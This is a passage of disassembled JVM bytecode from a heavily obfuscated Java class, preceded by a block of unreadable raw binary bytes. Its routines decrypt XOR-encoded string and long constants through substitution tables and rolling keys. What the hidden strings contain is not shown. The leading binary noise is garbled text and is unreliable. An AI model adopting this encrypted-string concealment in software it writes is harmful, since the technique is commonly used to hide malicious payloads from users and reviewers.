\u0006\u009bØ©\u000f\u0098\u0096\t×Í½*ïÖ³\u0081\u0090\u0002p\u0001\bÂ>ÁìT÷*\u001e)\u001fáä\u0004Ë¦¸»úq\u0017\fäÑ4l÷BRR\u0089ªè\u0002\u0083tVO¥\u0004³¸!1Ò::\rð«v\u0007Ho\u009c(\u0088BVKÞx\u000e8·?\u009b\u009eo\u0098)ÎA¤6\u0018Ñ\u008c\u000bÌPï/ú\'aMÕÞ%¯\u0003\u0081\u0016¿àØÄ¹y\u0018\u0005ÆÔ\u0012wY\u0089.gZ\u0098ìgç\u0002CC³\u009fÃõ\u0091\\2]\u0018\u000e\u0004/\u0003)+_¢\u000e\u0094}c\u001c\n&£fÈê\f\t\u0017Ý\núì]é¾ØV\u00968^\t\u001bTýÿöÛä@Ê\t\u0002!¹\u0092\u0088\u0015\u001eù\u0007bû\u0019ª\u0014#º\t4=\u0091(\u0003YKm\u000b\u00923K8B\u0004/Ia@v\u0014êgr©{ñ\u009bÏ{Õ-\u0081\t?ò##lµì_#`\u0091\u0015Su»)ü×vè\u0012åG¬5 HÀýé·\u0011´\u0019:,\u0094Aï ,en\u0005\u0018®\u0085B\\¦j.­µQ\u0010J\u0006Sl×z¬Å\rÝë\u0006V\u008c \u0015ôzñ¹]8\u0005\u008e9³\u0082\u0006\u0004ù¹\u0014õ\b,`æ\u009f\u0084nüy\u0007·\u00836\u0006Ý\"ê
        17: dup
        18: astore        10
        20: invokevirtual #62                 // Method java/lang/String.length:()I
        23: istore        12
        25: bipush        8
        27: istore        9
        29: iconst_m1
        30: istore        8
        32: iinc          8, 1
        35: aload         10
        37: iload         8
        39: dup
        40: iload         9
        42: iadd
        43: invokevirtual #311                // Method java/lang/String.substring:(II)Ljava/lang/String;
        46: iconst_m1
        47: goto          184
        50: aload         13
        52: swap
        53: iload         11
        55: iinc          11, 1
        58: swap
        59: aastore
        60: iload         8
        62: iload         9
        64: iadd
        65: dup
        66: istore        8
        68: iload         12
        70: if_icmpge     85
        73: aload         10
        75: iload         8
        77: invokevirtual #184                // Method java/lang/String.charAt:(I)C
        80: istore        9
        82: goto          32
        85: ldc           #10                 // String ø\u009a\u008dü3\u0096û\b\u00172ó\rûãöÝDH\u0005\'¥\u0082B3G
        87: dup
        88: astore        10
        90: invokevirtual #62                 // Method java/lang/String.length:()I
        93: istore        12
        95: bipush        11
        97: istore        9
        99: iconst_m1
       100: istore        8
       102: iinc          8, 1
       105: aload         10
       107: iload         8
       109: dup
       110: iload         9
       112: iadd
       113: invokevirtual #311                // Method java/lang/String.substring:(II)Ljava/lang/String;
       116: iconst_0
       117: goto          184
       120: aload         13
       122: swap
       123: iload         11
       125: iinc          11, 1
       128: swap
       129: aastore
       130: iload         8
       132: iload         9
       134: iadd
       135: dup
       136: istore        8
       138: iload         12
       140: if_icmpge     155
       143: aload         10
       145: iload         8
       147: invokevirtual #184                // Method java/lang/String.charAt:(I)C
       150: istore        9
       152: goto          102
       155: aload         13
       157: putstatic     #133                // Field a:[Ljava/lang/String;
       160: bipush        59
       162: anewarray     #249                // class java/lang/String
       165: putstatic     #126                // Field b:[Ljava/lang/String;
       168: ldc           #14                 // int 242870423
       170: ldc           #21                 // int -242845568
       172: lload         6
       174: l2i
       175: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       178: putstatic     #222                // Field D:Ljava/lang/String;
       181: goto          336
       184: swap
       185: invokevirtual #199                // Method java/lang/String.toCharArray:()[C
       188: dup
       189: arraylength
       190: swap
       191: iconst_0
       192: istore        14
       194: swap
       195: dup_x1
       196: iconst_1
       197: if_icmpgt     295
       200: dup
       201: iload         14
       203: dup2
       204: caload
       205: iload         14
       207: bipush        7
       209: irem
       210: tableswitch   { // 0 to 5
                       0: 248
                       1: 253
                       2: 258
                       3: 262
                       4: 267
                       5: 272
                 default: 277
            }
       248: bipush        37
       250: goto          279
       253: bipush        71
       255: goto          279
       258: iconst_4
       259: goto          279
       262: bipush        119
       264: goto          279
       267: bipush        112
       269: goto          279
       272: bipush        111
       274: goto          279
       277: bipush        104
       279: ixor
       280: i2c
       281: castore
       282: iinc          14, 1
       285: swap
       286: dup_x1
       287: ifne          295
       290: dup2
       291: swap
       292: goto          203
       295: swap
       296: dup_x1
       297: iload         14
       299: if_icmpgt     200
       302: new           #249                // class java/lang/String
       305: dup_x1
       306: swap
       307: invokespecial #303                // Method java/lang/String."<init>":([C)V
       310: invokevirtual #42                 // Method java/lang/String.intern:()Ljava/lang/String;
       313: swap
       314: pop
       315: swap
       316: tableswitch   { // 0 to 0
                       0: 120
                 default: 50
            }
       336: iconst_3
       337: newarray       long
       339: astore        4
       341: iconst_0
       342: istore_1
       343: ldc           #8                  // String Cµ¶5\u0000éAZ3Cy\u001f¤åö\u009c1C?´£~\u0089\u0011
       345: dup
       346: astore_2
       347: invokevirtual #62                 // Method java/lang/String.length:()I
       350: istore_3
       351: iconst_0
       352: istore_0
       353: aload_2
       354: iload_0
       355: iinc          0, 8
       358: iload_0
       359: invokevirtual #311                // Method java/lang/String.substring:(II)Ljava/lang/String;
       362: ldc           #16                 // String ISO-8859-1
       364: invokevirtual #135                // Method java/lang/String.getBytes:(Ljava/lang/String;)[B
       367: astore        5
       369: aload         4
       371: iload_1
       372: iinc          1, 1
       375: aload         5
       377: iconst_0
       378: baload
       379: i2l
       380: ldc2_w        #383                // long 255l
       383: land
       384: bipush        56
       386: lshl
       387: aload         5
       389: iconst_1
       390: baload
       391: i2l
       392: ldc2_w        #383                // long 255l
       395: land
       396: bipush        48
       398: lshl
       399: lor
       400: aload         5
       402: iconst_2
       403: baload
       404: i2l
       405: ldc2_w        #383                // long 255l
       408: land
       409: bipush        40
       411: lshl
       412: lor
       413: aload         5
       415: iconst_3
       416: baload
       417: i2l
       418: ldc2_w        #383                // long 255l
       421: land
       422: bipush        32
       424: lshl
       425: lor
       426: aload         5
       428: iconst_4
       429: baload
       430: i2l
       431: ldc2_w        #383                // long 255l
       434: land
       435: bipush        24
       437: lshl
       438: lor
       439: aload         5
       441: iconst_5
       442: baload
       443: i2l
       444: ldc2_w        #383                // long 255l
       447: land
       448: bipush        16
       450: lshl
       451: lor
       452: aload         5
       454: bipush        6
       456: baload
       457: i2l
       458: ldc2_w        #383                // long 255l
       461: land
       462: bipush        8
       464: lshl
       465: lor
       466: aload         5
       468: bipush        7
       470: baload
       471: i2l
       472: ldc2_w        #383                // long 255l
       475: land
       476: lor
       477: iconst_m1
       478: goto          502
       481: lastore
       482: iload_0
       483: iload_3
       484: if_icmplt     353
       487: aload         4
       489: putstatic     #277                // Field c:[J
       492: iconst_3
       493: anewarray     #79                 // class java/lang/Long
       496: putstatic     #48                 // Field d:[Ljava/lang/Long;
       499: goto          513
       502: dup_x2
       503: pop
       504: lload         6
       506: lxor
       507: dup2_x1
       508: pop2
       509: pop
       510: goto          481
       513: return

  private static java.lang.String a(int, int, int);
    Code:
         0: iload_0
         1: iload_2
         2: ixor
         3: sipush        -11532
         6: ixor
         7: ldc           #7                  // int 65535
         9: iand
        10: istore_3
        11: getstatic     #126                // Field b:[Ljava/lang/String;
        14: iload_3
        15: aaload
        16: ifnonnull     2627
        19: getstatic     #133                // Field a:[Ljava/lang/String;
        22: iload_3
        23: aaload
        24: invokevirtual #199                // Method java/lang/String.toCharArray:()[C
        27: astore        4
        29: aload         4
        31: iconst_0
        32: caload
        33: sipush        255
        36: iand
        37: tableswitch   { // 0 to 254
                       0: 1072
                       1: 1078
                       2: 1084
                       3: 1090
                       4: 1095
                       5: 1100
                       6: 1105
                       7: 1111
                       8: 1116
                       9: 1122
                      10: 1128
                      11: 1133
                      12: 1138
                      13: 1144
                      14: 1150
                      15: 1155
                      16: 1161
                      17: 1167
                      18: 1172
                      19: 1178
                      20: 1184
                      21: 1189
                      22: 1193
                      23: 1198
                      24: 1203
                      25: 1208
                      26: 1214
                      27: 1220
                      28: 1226
                      29: 1231
                      30: 1236
                      31: 1241
                      32: 1246
                      33: 1252
                      34: 1258
                      35: 1263
                      36: 1269
                      37: 1274
                      38: 1280
                      39: 1285
                      40: 1290
                      41: 1295
                      42: 1300
                      43: 1306
                      44: 1311
                      45: 1317
                      46: 1323
                      47: 1329
                      48: 1335
                      49: 1340
                      50: 1345
                      51: 1350
                      52: 1355
                      53: 1361
                      54: 1366
                      55: 1371
                      56: 1376
                      57: 1381
                      58: 1387
                      59: 1393
                      60: 1399
                      61: 1404
                      62: 1410
                      63: 1416
                      64: 1421
                      65: 1426
                      66: 1432
                      67: 1438
                      68: 1443
                      69: 1449
                      70: 1455
                      71: 1460
                      72: 1466
                      73: 1471
                      74: 1476
                      75: 1482
                      76: 1487
                      77: 1493
                      78: 1498
                      79: 1503
                      80: 1507
                      81: 1511
                      82: 1516
                      83: 1521
                      84: 1527
                      85: 1533
                      86: 1539
                      87: 1544
                      88: 1549
                      89: 1555
                      90: 1559
                      91: 1565
                      92: 1571
                      93: 1576
                      94: 1581
                      95: 1586
                      96: 1591
                      97: 1596
                      98: 1601
                      99: 1607
                     100: 1613
                     101: 1618
                     102: 1624
                     103: 1630
                     104: 1635
                     105: 1641
                     106: 1647
                     107: 1653
                     108: 1658
                     109: 1663
                     110: 1669
                     111: 1675
                     112: 1680
                     113: 1685
                     114: 1691
                     115: 1697
                     116: 1702
                     117: 1708
                     118: 1714
                     119: 1719
                     120: 1725
                     121: 1731
                     122: 1737
                     123: 1743
                     124: 1749
                     125: 1754
                     126: 1759
                     127: 1764
                     128: 1770
                     129: 1776
                     130: 1781
                     131: 1786
                     132: 1791
                     133: 1797
                     134: 1803
                     135: 1809
                     136: 1813
                     137: 1818
                     138: 1823
                     139: 1828
                     140: 1834
                     141: 1839
                     142: 1844
                     143: 1849
                     144: 1855
                     145: 1861
                     146: 1866
                     147: 1871
                     148: 1876
                     149: 1881
                     150: 1887
                     151: 1893
                     152: 1899
                     153: 1905
                     154: 1911
                     155: 1917
                     156: 1922
                     157: 1927
                     158: 1932
                     159: 1938
                     160: 1942
                     161: 1947
                     162: 1953
                     163: 1959
                     164: 1965
                     165: 1971
                     166: 1976
                     167: 1981
                     168: 1987
                     169: 1993
                     170: 1998
                     171: 2004
                     172: 2009
                     173: 2015
                     174: 2021
                     175: 2027
                     176: 2033
                     177: 2038
                     178: 2044
                     179: 2049
                     180: 2054
                     181: 2059
                     182: 2065
                     183: 2071
                     184: 2076
                     185: 2082
                     186: 2088
                     187: 2094
                     188: 2099
                     189: 2104
                     190: 2110
                     191: 2115
                     192: 2120
                     193: 2126
                     194: 2132
                     195: 2138
                     196: 2143
                     197: 2148
                     198: 2154
                     199: 2159
                     200: 2164
                     201: 2169
                     202: 2175
                     203: 2181
                     204: 2186
                     205: 2192
                     206: 2197
                     207: 2203
                     208: 2209
                     209: 2214
                     210: 2219
                     211: 2225
                     212: 2230
                     213: 2235
                     214: 2241
                     215: 2247
                     216: 2253
                     217: 2259
                     218: 2264
                     219: 2269
                     220: 2275
                     221: 2280
                     222: 2286
                     223: 2292
                     224: 2298
                     225: 2303
                     226: 2309
                     227: 2314
                     228: 2320
                     229: 2326
                     230: 2331
                     231: 2337
                     232: 2342
                     233: 2348
                     234: 2353
                     235: 2358
                     236: 2363
                     237: 2369
                     238: 2375
                     239: 2381
                     240: 2386
                     241: 2391
                     242: 2396
                     243: 2402
                     244: 2408
                     245: 2413
                     246: 2418
                     247: 2424
                     248: 2429
                     249: 2434
                     250: 2440
                     251: 2446
                     252: 2452
                     253: 2457
                     254: 2462
                 default: 2468
            }
      1072: sipush        228
      1075: goto          2471
      1078: sipush        218
      1081: goto          2471
      1084: sipush        128
      1087: goto          2471
      1090: bipush        38
      1092: goto          2471
      1095: bipush        121
      1097: goto          2471
      1100: bipush        39
      1102: goto          2471
      1105: sipush        160
      1108: goto          2471
      1111: bipush        70
      1113: goto          2471
      1116: sipush        182
      1119: goto          2471
      1122: sipush        226
      1125: goto          2471
      1128: bipush        46
      1130: goto          2471
      1133: bipush        60
      1135: goto          2471
      1138: sipush        167
      1141: goto          2471
      1144: sipush        164
      1147: goto          2471
      1150: bipush        96
      1152: goto          2471
      1155: sipush        169
      1158: goto          2471
      1161: sipush        191
      1164: goto          2471
      1167: bipush        127
      1169: goto          2471
      1172: sipush        225
      1175: goto          2471
      1178: sipush        147
      1181: goto          2471
      1184: bipush        34
      1186: goto          2471
      1189: iconst_2
      1190: goto          2471
      1193: bipush        47
      1195: goto          2471
      1198: bipush        103
      1200: goto          2471
      1203: bipush        32
      1205: goto          2471
      1208: sipush        146
      1211: goto          2471
      1214: sipush        249
      1217: goto          2471
      1220: sipush        150
      1223: goto          2471
      1226: bipush        122
      1228: goto          2471
      1231: bipush        6
      1233: goto          2471
      1236: bipush        45
      1238: goto          2471
      1241: bipush        29
      1243: goto          2471
      1246: sipush        181
      1249: goto          2471
      1252: sipush        139
      1255: goto          2471
      1258: bipush        19
      1260: goto          2471
      1263: sipush        202
      1266: goto          2471
      1269: bipush        27
      1271: goto          2471
      1274: sipush        131
      1277: goto          2471
      1280: bipush        55
      1282: goto          2471
      1285: bipush        36
      1287: goto          2471
      1290: bipush        11
      1292: goto          2471
      1295: bipush        108
      1297: goto          2471
      1300: sipush        201
      1303: goto          2471
      1306: bipush        77
      1308: goto          2471
      1311: sipush        205
      1314: goto          2471
      1317: sipush        165
      1320: goto          2471
      1323: sipush        144
      1326: goto          2471
      1329: sipush        224
      1332: goto          2471
      1335: bipush        35
      1337: goto          2471
      1340: bipush        52
      1342: goto          2471
      1345: bipush        13
      1347: goto          2471
      1350: bipush        15
      1352: goto          2471
      1355: sipush        192
      1358: goto          2471
      1361: bipush        31
      1363: goto          2471
      1366: bipush        73
      1368: goto          2471
      1371: bipush        7
      1373: goto          2471
      1376: bipush        8
      1378: goto          2471
      1381: sipush        190
      1384: goto          2471
      1387: sipush        255
      1390: goto          2471
      1393: sipush        221
      1396: goto          2471
      1399: bipush        41
      1401: goto          2471
      1404: sipush        207
      1407: goto          2471
      1410: sipush        241
      1413: goto          2471
      1416: bipush        126
      1418: goto          2471
      1421: bipush        110
      1423: goto          2471
      1426: sipush        173
      1429: goto          2471
      1432: sipush        252
      1435: goto          2471
      1438: bipush        111
      1440: goto          2471
      1443: sipush        211
      1446: goto          2471
      1449: sipush        141
      1452: goto          2471
      1455: bipush        100
      1457: goto          2471
      1460: sipush        232
      1463: goto          2471
      1466: bipush        21
      1468: goto          2471
      1471: bipush        109
      1473: goto          2471
      1476: sipush        176
      1479: goto          2471
      1482: bipush        48
      1484: goto          2471
      1487: sipush        177
      1490: goto          2471
      1493: bipush        56
      1495: goto          2471
      1498: bipush        93
      1500: goto          2471
      1503: iconst_5
      1504: goto          2471
      1507: iconst_0
      1508: goto          2471
      1511: bipush        89
      1513: goto          2471
      1516: bipush        107
      1518: goto          2471
      1521: sipush        183
      1524: goto          2471
      1527: sipush        161
      1530: goto          2471
      1533: sipush        136
      1536: goto          2471
      1539: bipush        49
      1541: goto          2471
      1544: bipush        72
      1546: goto          2471
      1549: sipush        195
      1552: goto          2471
      1555: iconst_1
      1556: goto          2471
      1559: sipush        137
      1562: goto          2471
      1565: sipush        172
      1568: goto          2471
      1571: bipush        51
      1573: goto          2471
      1576: bipush        90
      1578: goto          2471
      1581: bipush        86
      1583: goto          2471
      1586: bipush        98
      1588: goto          2471
      1591: bipush        58
      1593: goto          2471
      1596: bipush        59
      1598: goto          2471
      1601: sipush        204
      1604: goto          2471
      1607: sipush        238
      1610: goto          2471
      1613: bipush        64
      1615: goto          2471
      1618: sipush        212
      1621: goto          2471
      1624: sipush        143
      1627: goto          2471
      1630: bipush        30
      1632: goto          2471
      1635: sipush        229
      1638: goto          2471
      1641: sipush        233
      1644: goto          2471
      1647: sipush        215
      1650: goto          2471
      1653: bipush        117
      1655: goto          2471
      1658: bipush        65
      1660: goto          2471
      1663: sipush        155
      1666: goto          2471
      1669: sipush        242
      1672: goto          2471
      1675: bipush        82
      1677: goto          2471
      1680: bipush        125
      1682: goto          2471
      1685: sipush        243
      1688: goto          2471
      1691: sipush        129
      1694: goto          2471
      1697: bipush        123
      1699: goto          2471
      1702: sipush        180
      1705: goto          2471
      1708: sipush        194
      1711: goto          2471
      1714: bipush        76
      1716: goto          2471
      1719: sipush        135
      1722: goto          2471
      1725: sipush        133
      1728: goto          2471
      1731: sipush        223
      1734: goto          2471
      1737: sipush        199
      1740: goto          2471
      1743: sipush        247
      1746: goto          2471
      1749: bipush        12
      1751: goto          2471
      1754: bipush        63
      1756: goto          2471
      1759: bipush        28
      1761: goto          2471
      1764: sipush        130
      1767: goto          2471
      1770: sipush        174
      1773: goto          2471
      1776: bipush        85
      1778: goto          2471
      1781: bipush        66
      1783: goto          2471
      1786: bipush        50
      1788: goto          2471
      1791: sipush        179
      1794: goto          2471
      1797: sipush        185
      1800: goto          2471
      1803: sipush        213
      1806: goto          2471
      1809: iconst_4
      1810: goto          2471
      1813: bipush        95
      1815: goto          2471
      1818: bipush        43
      1820: goto          2471
      1823: bipush        79
      1825: goto          2471
      1828: sipush        157
      1831: goto          2471
      1834: bipush        124
      1836: goto          2471
      1839: bipush        106
      1841: goto          2471
      1844: bipush        87
      1846: goto          2471
      1849: sipush        162
      1852: goto          2471
      1855: sipush        163
      1858: goto          2471
      1861: bipush        104
      1863: goto          2471
      1866: bipush        92
      1868: goto          2471
      1871: bipush        10
      1873: goto          2471
      1876: bipush        105
      1878: goto          2471
      1881: sipush        236
      1884: goto          2471
      1887: sipush        251
      1890: goto          2471
      1893: sipush        178
      1896: goto          2471
      1899: sipush        220
      1902: goto          2471
      1905: sipush        216
      1908: goto          2471
      1911: sipush        189
      1914: goto          2471
      1917: bipush        23
      1919: goto          2471
      1922: bipush        112
      1924: goto          2471
      1927: bipush        22
      1929: goto          2471
      1932: sipush        222
      1935: goto          2471
      1938: iconst_3
      1939: goto          2471
      1942: bipush        24
      1944: goto          2471
      1947: sipush        210
      1950: goto          2471
      1953: sipush        186
      1956: goto          2471
      1959: sipush        227
      1962: goto          2471
      1965: sipush        138
      1968: goto          2471
      1971: bipush        118
      1973: goto          2471
      1976: bipush        53
      1978: goto          2471
      1981: sipush        200
      1984: goto          2471
      1987: sipush        214
      1990: goto          2471
      1993: bipush        114
      1995: goto          2471
      1998: sipush        153
      2001: goto          2471
      2004: bipush        113
      2006: goto          2471
      2009: sipush        187
      2012: goto          2471
      2015: sipush        170
      2018: goto          2471
      2021: sipush        219
      2024: goto          2471
      2027: sipush        140
      2030: goto          2471
      2033: bipush        120
      2035: goto          2471
      2038: sipush        244
      2041: goto          2471
      2044: bipush        67
      2046: goto          2471
      2049: bipush        102
      2051: goto          2471
      2054: bipush        71
      2056: goto          2471
      2059: sipush        142
      2062: goto          2471
      2065: sipush        234
      2068: goto          2471
      2071: bipush        44
      2073: goto          2471
      2076: sipush        208
      2079: goto          2471
      2082: sipush        168
      2085: goto          2471
      2088: sipush        152
      2091: goto          2471
      2094: bipush        37
      2096: goto          2471
      2099: bipush        54
      2101: goto          2471
      2104: sipush        149
      2107: goto          2471
      2110: bipush        91
      2112: goto          2471
      2115: bipush        78
      2117: goto          2471
      2120: sipush        254
      2123: goto          2471
      2126: sipush        145
      2129: goto          2471
      2132: sipush        237
      2135: goto          2471
      2138: bipush        14
      2140: goto          2471
      2143: bipush        81
      2145: goto          2471
      2148: sipush        240
      2151: goto          2471
      2154: bipush        115
      2156: goto          2471
      2159: bipush        97
      2161: goto          2471
      2164: bipush        20
      2166: goto          2471
      2169: sipush        159
      2172: goto          2471
      2175: sipush        154
      2178: goto          2471
      2181: bipush        17
      2183: goto          2471
      2186: sipush        248
      2189: goto          2471
      2192: bipush        101
      2194: goto          2471
      2197: sipush        198
      2200: goto          2471
      2203: sipush        132
      2206: goto          2471
      2209: bipush        16
      2211: goto          2471
      2214: bipush        119
      2216: goto          2471
      2219: sipush        197
      2222: goto          2471
      2225: bipush        75
      2227: goto          2471
      2230: bipush        80
      2232: goto          2471
      2235: sipush        188
      2238: goto          2471
      2241: sipush        230
      2244: goto          2471
      2247: sipush        166
      2250: goto          2471
      2253: sipush        253
      2256: goto          2471
      2259: bipush        33
      2261: goto          2471
      2264: bipush        88
      2266: goto          2471
      2269: sipush        239
      2272: goto          2471
      2275: bipush        62
      2277: goto          2471
      2280: sipush        184
      2283: goto          2471
      2286: sipush        250
      2289: goto          2471
      2292: sipush        171
      2295: goto          2471
      2298: bipush        18
      2300: goto          2471
      2303: sipush        217
      2306: goto          2471
      2309: bipush        57
      2311: goto          2471
      2314: sipush        203
      2317: goto          2471
      2320: sipush        134
      2323: goto          2471
      2326: bipush        42
      2328: goto          2471
      2331: sipush        231
      2334: goto          2471
      2337: bipush        9
      2339: goto          2471
      2342: sipush        206
      2345: goto          2471
      2348: bipush        25
      2350: goto          2471
      2353: bipush        116
      2355: goto          2471
      2358: bipush        94
      2360: goto          2471
      2363: sipush        151
      2366: goto          2471
      2369: sipush        148
      2372: goto          2471
      2375: sipush        246
      2378: goto          2471
      2381: bipush        83
      2383: goto          2471
      2386: bipush        61
      2388: goto          2471
      2391: bipush        74
      2393: goto          2471
      2396: sipush        245
      2399: goto          2471
      2402: sipush        235
      2405: goto          2471
      2408: bipush        40
      2410: goto          2471
      2413: bipush        99
      2415: goto          2471
      2418: sipush        209
      2421: goto          2471
      2424: bipush        68
      2426: goto          2471
      2429: bipush        26
      2431: goto          2471
      2434: sipush        158
      2437: goto          2471
      2440: sipush        156
      2443: goto          2471
      2446: sipush        196
      2449: goto          2471
      2452: bipush        84
      2454: goto          2471
      2457: bipush        69
      2459: goto          2471
      2462: sipush        193
      2465: goto          2471
      2468: sipush        175
      2471: istore        5
      2473: iload_1
      2474: iload_2
      2475: ixor
      2476: dup
      2477: istore_1
      2478: sipush        255
      2481: iand
      2482: iload         5
      2484: isub
      2485: istore        6
      2487: iload         6
      2489: ifge          2498
      2492: iinc_w        6, 256
      2498: iload_1
      2499: ldc           #7                  // int 65535
      2501: iand
      2502: bipush        8
      2504: iushr
      2505: iload         5
      2507: isub
      2508: istore        7
      2510: iload         7
      2512: ifge          2521
      2515: iinc_w        7, 256
      2521: iconst_0
      2522: istore        8
      2524: goto          2602
      2527: iload         8
      2529: iconst_2
      2530: irem
      2531: istore        9
      2533: aload         4
      2535: iload         8
      2537: dup2
      2538: caload
      2539: iload         9
      2541: ifne          2573
      2544: iload         6
      2546: ixor
      2547: i2c
      2548: castore
      2549: iload         6
      2551: iconst_3
      2552: iushr
      2553: iload         6
      2555: iconst_5
      2556: ishl
      2557: ior
      2558: aload         4
      2560: iload         8
      2562: caload
      2563: ixor
      2564: sipush        255
      2567: iand
      2568: istore        6
      2570: goto          2599
      2573: iload         7
      2575: ixor
      2576: i2c
      2577: castore
      2578: iload         7
      2580: iconst_3
      2581: iushr
      2582: iload         7
      2584: iconst_5
      2585: ishl
      2586: ior
      2587: aload         4
      2589: iload         8
      2591: caload
      2592: ixor
      2593: sipush        255
      2596: iand
      2597: istore        7
      2599: iinc          8, 1
      2602: iload         8
      2604: aload         4
      2606: arraylength
      2607: if_icmplt     2527
      2610: getstatic     #126                // Field b:[Ljava/lang/String;
      2613: iload_3
      2614: new           #249                // class java/lang/String
      2617: dup
      2618: aload         4
      2620: invokespecial #303                // Method java/lang/String."<init>":([C)V
      2623: invokevirtual #42                 // Method java/lang/String.intern:()Ljava/lang/String;
      2626: aastore
      2627: getstatic     #126                // Field b:[Ljava/lang/String;
      2630: iload_3
      2631: aaload
      2632: areturn

  private static long a(int, long);
    Code:
         0: iload_0
         1: lload_1
         2: l2i
         3: ixor
         4: sipush        10622
         7: ixor
         8: sipush        32767
        11: iand
        12: istore_3
        13: getstatic     #48                 // Field d:[Ljava/lang/Long;
        16: iload_3
        17: aaload
        18: ifnonnull     36
        21: getstatic     #48                 // Field d:[Ljava/lang/Long;
        24: iload_3
        25: getstatic     #277                // Field c:[J
        28: iload_3
        29: laload
        30: lload_1
        31: lxor
        32: invokestatic  #82                 // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
        35: aastore
        36: getstatic     #48                 // Field d:[Ljava/lang/Long;
        39: iload_3
        40: aaload
        41: invokevirtual #56                 // Method java/lang/Long.longValue:()J
        44: lreturn
}
